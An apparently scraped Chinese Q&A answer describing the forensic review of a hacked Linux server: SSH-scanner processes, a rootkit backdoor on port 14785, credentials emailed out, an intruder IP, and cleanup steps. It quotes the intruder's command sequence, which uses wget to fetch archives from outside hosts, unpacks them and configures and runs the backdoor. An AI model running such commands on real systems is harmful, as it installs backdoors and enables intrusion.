怎样分析一台被入侵的linux服务器?
客户反映一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下 黑客进入服务器后所做的操作: 1。 向/var/tmp/下上传了两个恶意程序 其中wtf为向外扫描其它服务器的ssh-scan黑客软件,。access。log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo。 com这个邮箱。 2。 入侵者登陆记录 85...全部
客户反映一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下 黑客进入服务器后所做的操作: 1。
向/var/tmp/下上传了两个恶意程序 其中wtf为向外扫描其它服务器的ssh-scan黑客软件,。access。log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo。
com这个邮箱。 2。 入侵者登陆记录 85。120。78。140的IP来自罗马尼亚。 3。 wget http://pinky。clan。su/scan/wtf。
jpg ; tar zxvf wtf。jpg wget adelinuangell。lx。ro/ryo。tar tar xvf ryo。tar cd 。access。log 。/config Ady 14785 。
/run 结束进程。删掉程序。。删掉用户。修改root密码。
以上是我对于这个问题的解答,希望能够帮到大家。收起
